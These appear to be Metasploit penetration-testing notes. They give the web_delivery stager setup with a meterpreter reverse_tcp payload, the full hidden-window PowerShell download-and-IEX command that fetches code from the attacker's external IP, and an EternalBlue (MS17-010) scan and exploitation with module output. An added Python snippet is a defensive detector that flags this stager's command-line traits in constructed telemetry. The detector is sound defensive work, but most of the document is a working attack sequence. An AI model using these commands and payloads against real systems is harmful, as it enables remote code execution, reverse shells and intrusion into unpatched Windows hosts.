MSF Introduction

Installing this way is the best option; afterwards, install PostgreSQL yourself so that the fast search can be used to look up vulnerabilities.
curl > msfinstall
chmod 755 msfinstall
./msfinstall

MSF web_delivery

msf > use exploit/multi/script/web_delivery  
- Set which kind of system the target is, so the module generates the matching PHP / Python / PowerShell stager
msf exploit(web_delivery) > set target 2  
target => 2  
- Choose the reverse-connection payload
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp  
payload => windows/meterpreter/reverse_tcp  
- Start the URL that will be served on the server
msf exploit(web_delivery) > set SRVPORT 8081  
SRVPORT => 8081  
msf exploit(web_delivery) > set URIPATH /  
URIPATH => /  
msf exploit(web_delivery) > set lhost ip  # public (external) IP address  
lhost => ip  
- Set the IP and port that the reverse shell connects back to
msf exploit(web_delivery) > set lport 6666  
lport => 6666  
msf exploit(web_delivery) > run  
[*] Exploit running as background job.
[*] Started reverse TCP handler on
msf exploit(web_delivery) > [*] Using URL:  
[*] Local IP:
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');  
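From the defender's side, the stager command above has a recognisable shape in process-creation telemetry. The following checker is an added example (not part of the original notes): it scores constructed PowerShell command lines against the traits of the web_delivery stager (no profile, hidden window, WebClient download, system-proxy reuse, in-memory execution via IEX) and only flags a line when several co-occur. The host names, log lines and the 203.0.113.10 listener address are all constructed.

```python
import re

# Indicators taken from the web_delivery stager above: no profile, hidden
# window, a WebClient download, system-proxy reuse and in-memory execution.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "webclient": re.compile(r"net\.webclient", re.I),
    "download": re.compile(r"download(?:string|data|file)\s*\(", re.I),
    "iex": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "system_proxy": re.compile(r"GetSystemWebProxy", re.I),
}

# Constructed process-creation command lines (not real telemetry);
# 203.0.113.10 is a documentation address standing in for the listener.
SAMPLE_EVENTS = [
    ("host1", "powershell.exe -nop -w hidden -c $k=new-object net.webclient;"
              "$k.proxy=[Net.WebRequest]::GetSystemWebProxy();"
              "$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
              "IEX $k.downloadstring('http://203.0.113.10:8081/');"),
    ("host2", "powershell.exe -NoProfile -Command Get-Process | Out-File p.txt"),
    ("host3", "PowerShell.exe -NoP -WindowStyle Hidden -Command "
              "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:8081/')"),
    ("host4", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
]


def classify(cmdline):
    """Return the names of the stager indicators present in one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def scan_events(events, threshold=3):
    """Return (host, indicators) for events where enough indicators co-occur.

    A single flag such as -nop is common in benign automation, so alert only
    when several stager traits appear together."""
    hits = []
    for host, cmdline in events:
        matched = classify(cmdline)
        if len(matched) >= threshold:
            hits.append((host, matched))
    return hits


if __name__ == "__main__":
    for host, matched in scan_events(SAMPLE_EVENTS):
        print(f"{host}: web_delivery-style stager ({', '.join(matched)})")
```

The same indicator set can be fed to Sysmon Event ID 1 or Windows 4688 command-line fields; the threshold keeps single benign flags like -NoProfile from alerting on their own.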

MSF ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS -
set threads 100
[+] - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[!] - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x32752EAF

msf > use exploit/windows/smb/ms17_010_eternalblue  
msf exploit(ms17_010_eternalblue) > set rhost  
msf exploit(ms17_010_eternalblue) > options  
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp  
msf exploit(ms17_010_eternalblue) > set lhost 本机ip  
msf exploit(ms17_010_eternalblue) > set lport 本机监听port  
msf exploit(ms17_010_eternalblue) > run -j  
Module options (exploit/windows/smb/ms17_010_eternalblue):  
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):  
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     6666             yes       The listen port

Exploit target:  
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs